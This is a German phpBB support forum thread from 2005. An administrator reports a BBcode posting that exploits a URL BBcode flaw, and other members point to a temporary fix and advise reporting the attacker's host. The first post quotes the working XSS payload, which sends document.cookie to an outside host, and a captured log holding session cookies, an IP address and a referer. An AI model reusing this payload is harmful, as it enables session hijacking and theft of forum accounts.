Benutzer zeichnet das Forum auf.

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
Alrik
Mitglied
Beiträge: 11
Registriert: 07.09.2003 15:31

Benutzer zeichnet das Forum auf.

Beitrag von Alrik »

Hallo

In meinem Forum benutzt ein Benutzer regelmäßgig folgenden Code:


In seinem Post:

Code: Alles auswählen

[quote][color=#ab8c5b][url]www.ut[url=www.s=''style='font-size:0;color:#ab8c5b'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://duffbear.du.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
Und angezeigt wird es gar nicht, aber im Quelltext sieht man:

Code: Alles auswählen

<span style="color: #ab8c5b"><a href="http://www.ut<a href="http://www.s=''style='font-size:0;color:#ab8c5b'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://duffbear.du.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;" target="_blank" class="postlink">" target="_blank" class="postlink">www.ut[url=www.s=''style='font-size:0;color:#ab8c5b'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i._='http://duffbear.du.funpic.de/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;]</a></a>'</span></span><span class="gensmall"></span></td>

Dann habe ich mal versucht es nachzuvollziehen und vermute dass er immer solche Dinge aufzeichnet:

Code: Alles auswählen

Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:32:\"06643c866b60159431eda050e5e6b6ec\";s:6:\"userid\";i:2;}; phpbb2mysql_sid=5d659961fdbe13d88564d0bb3c2587c4; phpbb2mysql_t=a:1:{i:164;i:1121780380;}
IP: 80.136.94.159
Date and Time: 19 July, 2005, 3:39 pm
Referer: http://www.wettschlacht.de/sp/phpBB2/viewtopic.php?t=164&postdays=0&postorder=asc&start=0&sid=5d659961fdbe13d88564d0bb3c2587c4
Client: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)


Könnt ihr mir erklären wie ich es schaffe, dass dies nicht mehr möglich ist in meinem Forum? (phpBB 2.0.15 mit dem behobenen Fehler von 2.0.16)


Danke.
Nach oben
Christian Benz
Mitglied
Beiträge: 854
Registriert: 25.02.2004 00:41
Wohnort: Regen
Kontaktdaten:
Kontaktdaten von Christian Benz

Beitrag von Christian Benz »

Hi,

scheint die aktuelle Lücke zu sein.
Solange das Update auf 2.0.17 noch nicht da ist, kannst du dir evtl. damit behelfen:
http://www.phpbb2.de/portal.php?topic_id=30123
Temporary fix for security issue in URL BBcode (phpBB 2.0.16)
Gruß,
Chris
Nach oben
Benutzeravatar
punkface
Mitglied
Beiträge: 3579
Registriert: 12.08.2004 23:37

Beitrag von punkface »

Sperr erstmal den Account in deinem Forum, und schreib dann den Funpic.de Admin (abuse@funpic.de) an, er soll den Account duffbear sperren, weil von dem Account aus Daten in deinem Forum ausspioniert werden .. siehe http://duffbear.du.funpic.de/
Nach oben
Alrik
Mitglied
Beiträge: 11
Registriert: 07.09.2003 15:31

Beitrag von Alrik »

Danke. Genau das war das Problem.

@punkface: Eine gute Idee. Ich habe den Betreiber mal angeschrieben.

Hat jemand eine Ahnung ob man in einem solchen Fall, wie diesem hier eine Anzeige gegen den Benutzer erstatten könnte? (Ich weiß genau wer er ist)


Woher bekommt man denn am besten in Zukunft schnell infos über neue Sicherheitslücken?
Nach oben
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“